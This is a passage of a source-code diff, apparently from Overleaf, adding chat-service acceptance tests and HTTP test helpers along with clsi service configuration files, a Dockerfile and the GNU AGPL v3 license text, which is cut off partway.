before(async function () { + await ChatApp.ensureRunning() + }) + + describe('globally', async function () { + const projectId = new ObjectId().toString() + const userId = new ObjectId().toString() + const content = 'global message' + before(async function () { + const { response, body } = await ChatClient.sendGlobalMessage( + projectId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + expect(body.content).to.equal(content) + expect(body.user_id).to.equal(userId) + expect(body.room_id).to.equal(projectId) + }) + + it('should then list the message in the project messages', async function () { + const { response, body: messages } = + await ChatClient.getGlobalMessages(projectId) + expect(response.statusCode).to.equal(200) + expect(messages.length).to.equal(1) + expect(messages[0].content).to.equal(content) + }) + }) + + describe('to a thread', async function () { + const projectId = new ObjectId().toString() + const userId = new ObjectId().toString() + const threadId = new ObjectId().toString() + const content = 'thread message' + before(async function () { + const { response, body } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + expect(body.content).to.equal(content) + expect(body.user_id).to.equal(userId) + expect(body.room_id).to.equal(projectId) + }) + + it('should then list the message in the threads', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].messages.length).to.equal(1) + expect(threads[threadId].messages[0].content).to.equal(content) + }) + + it('should not appear in the global messages', async function () { + const { response, body: messages } = + await ChatClient.getGlobalMessages(projectId) + expect(response.statusCode).to.equal(200) + expect(messages.length).to.equal(0) + }) + }) + + describe('failure cases', async function () { + const projectId = new ObjectId().toString() + const userId = new ObjectId().toString() + const threadId = new ObjectId().toString() + + describe('with a malformed userId', async function () { + it('should return a graceful error', async function () { + const { response, body } = await ChatClient.sendMessage( + projectId, + threadId, + 'malformed-user', + 'content' + ) + expect(response.statusCode).to.equal(400) + expect(body).to.equal('Invalid userId') + }) + }) + + describe('with a malformed projectId', async function () { + it('should return a graceful error', async function () { + const { response, body } = await ChatClient.sendMessage( + 'malformed-project', + threadId, + userId, + 'content' + ) + expect(response.statusCode).to.equal(400) + expect(body).to.equal('Invalid projectId') + }) + }) + + describe('with a malformed threadId', async function () { + it('should return a graceful error', async function () { + const { response, body } = await ChatClient.sendMessage( + projectId, + 'malformed-thread-id', + userId, + 'content' + ) + expect(response.statusCode).to.equal(400) + expect(body).to.equal('Invalid threadId') + }) + }) + + describe('with no content', async function () { + it('should return a graceful error', async function () { + const { response, body } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + null + ) + expect(response.statusCode).to.equal(400) + // Exegesis is responding with validation errors. I can´t find a way to choose the validation error yet. + // expect(body).to.equal('No content provided') + expect(body.message).to.equal('Validation errors') + }) + }) + + describe('with very long content', async function () { + it('should return a graceful error', async function () { + const content = '-'.repeat(10 * 1024 + 1) + const { response, body } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(400) + expect(body).to.equal('Content too long (> 10240 bytes)') + }) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/helpers/ChatApp.js b/services/chat/test/acceptance/js/helpers/ChatApp.js new file mode 100644 index 0000000..3a0baf5 --- /dev/null +++ b/services/chat/test/acceptance/js/helpers/ChatApp.js @@ -0,0 +1,15 @@ +import { createServer } from '../../../../app/js/server.js' +import { promisify } from 'node:util' + +export { db } from '../../../../app/js/mongodb.js' + +let serverPromise = null + +export async function ensureRunning() { + if (!serverPromise) { + const { app } = await createServer() + const startServer = promisify(app.listen.bind(app)) + serverPromise = startServer(3010, '127.0.0.1') + } + return serverPromise +} diff --git a/services/chat/test/acceptance/js/helpers/ChatClient.js b/services/chat/test/acceptance/js/helpers/ChatClient.js new file mode 100644 index 0000000..6a8196d --- /dev/null +++ b/services/chat/test/acceptance/js/helpers/ChatClient.js @@ -0,0 +1,166 @@ +import Request from 'request' + +const request = Request.defaults({ + baseUrl: 'http://127.0.0.1:3010', +}) + +async function asyncRequest(options) { + return await new Promise((resolve, reject) => { + request(options, (err, response, body) => { + if (err) { + reject(err) + } else { + resolve({ response, body }) + } + }) + }) +} + +export async function sendGlobalMessage(projectId, userId, content) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/messages`, + json: { + user_id: userId, + content, + }, + }) +} + +export async function getGlobalMessages(projectId) { + return await asyncRequest({ + method: 'get', + url: `/project/${projectId}/messages`, + json: true, + }) +} + +export async function sendMessage(projectId, threadId, userId, content) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/thread/${threadId}/messages`, + json: { + user_id: userId, + content, + }, + }) +} + +export async function getThreads(projectId) { + return await asyncRequest({ + method: 'get', + url: `/project/${projectId}/threads`, + json: true, + }) +} + +export async function resolveThread(projectId, threadId, userId) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/thread/${threadId}/resolve`, + json: { + user_id: userId, + }, + }) +} + +export async function getResolvedThreadIds(projectId) { + return await asyncRequest({ + method: 'get', + url: `/project/${projectId}/resolved-thread-ids`, + json: true, + }) +} + +export async function editMessage(projectId, threadId, messageId, content) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/thread/${threadId}/messages/${messageId}/edit`, + json: { + content, + }, + }) +} + +export async function editMessageWithUser( + projectId, + threadId, + messageId, + userId, + content +) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/thread/${threadId}/messages/${messageId}/edit`, + json: { + content, + userId, + }, + }) +} + +export async function checkStatus() { + return await asyncRequest({ + method: 'get', + url: `/status`, + json: true, + }) +} + +export async function getMetric(matcher) { + const { body } = await asyncRequest({ + method: 'get', + url: `/metrics`, + }) + const found = body.split('\n').find(matcher) + if (!found) return 0 + return parseInt(found.split(' ')[1], 0) +} + +export async function reopenThread(projectId, threadId) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/thread/${threadId}/reopen`, + }) +} + +export async function deleteThread(projectId, threadId) { + return await asyncRequest({ + method: 'delete', + url: `/project/${projectId}/thread/${threadId}`, + }) +} + +export async function deleteMessage(projectId, threadId, messageId) { + return await asyncRequest({ + method: 'delete', + url: `/project/${projectId}/thread/${threadId}/messages/${messageId}`, + }) +} + +export async function destroyProject(projectId) { + return await asyncRequest({ + method: 'delete', + url: `/project/${projectId}`, + }) +} + +export async function duplicateCommentThreads(projectId, threads) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/duplicate-comment-threads`, + json: { + threads, + }, + }) +} + +export async function generateThreadData(projectId, threads) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/generate-thread-data`, + json: { + threads, + }, + }) +} diff --git a/services/chat/test/setup.js b/services/chat/test/setup.js new file mode 100644 index 0000000..d61deff --- /dev/null +++ b/services/chat/test/setup.js @@ -0,0 +1,9 @@ +import chai from 'chai' +import chaiAsPromised from 'chai-as-promised' +import { ObjectId } from 'mongodb' + +// ensure every ObjectId has the id string as a property for correct comparisons +ObjectId.cacheHexString = true + +chai.should() +chai.use(chaiAsPromised) diff --git a/services/chat/tsconfig.json b/services/chat/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/chat/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/clsi/.gitignore b/services/clsi/.gitignore new file mode 100644 index 0000000..3604662 --- /dev/null +++ b/services/clsi/.gitignore @@ -0,0 +1,14 @@ +**.swp +node_modules +test/acceptance/fixtures/tmp +compiles +output +.DS_Store +*~ +cache +.vagrant +config/* +npm-debug.log + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/clsi/.mocharc.json b/services/clsi/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/clsi/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/clsi/.nvmrc b/services/clsi/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/clsi/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/clsi/.viminfo b/services/clsi/.viminfo new file mode 100644 index 0000000..78c0129 --- /dev/null +++ b/services/clsi/.viminfo @@ -0,0 +1,35 @@ +# This viminfo file was generated by Vim 7.4. +# You may edit it if you're careful! + +# Value of 'encoding' when this file was written +*encoding=latin1 + + +# hlsearch on (H) or off (h): +~h +# Command Line History (newest to oldest): +:x + +# Search String History (newest to oldest): + +# Expression History (newest to oldest): + +# Input Line History (newest to oldest): + +# Input Line History (newest to oldest): + +# Registers: + +# File marks: +'0 1 0 ~/hello + +# Jumplist (newest first): +-' 1 0 ~/hello + +# History of marks within files (newest to oldest): + +> ~/hello + " 1 0 + ^ 1 1 + . 1 0 + + 1 0 diff --git a/services/clsi/Dockerfile b/services/clsi/Dockerfile new file mode 100644 index 0000000..c5f46c1 --- /dev/null +++ b/services/clsi/Dockerfile @@ -0,0 +1,32 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/clsi +COPY services/clsi/install_deps.sh /overleaf/services/clsi/ +RUN chmod 0755 ./install_deps.sh && ./install_deps.sh +ENTRYPOINT ["/bin/sh", "/entrypoint.sh"] +COPY services/clsi/entrypoint.sh / + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/clsi/package.json /overleaf/services/clsi/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/clsi/ /overleaf/services/clsi/ + +FROM app +RUN mkdir -p cache compiles output \ +&& chown node:node cache compiles output + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/clsi/LICENSE b/services/clsi/LICENSE new file mode 100644 index 0000000..dba13ed --- /dev/null +++ b/services/clsi/LICENSE @@ -0,0 +1,661 @@ + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the 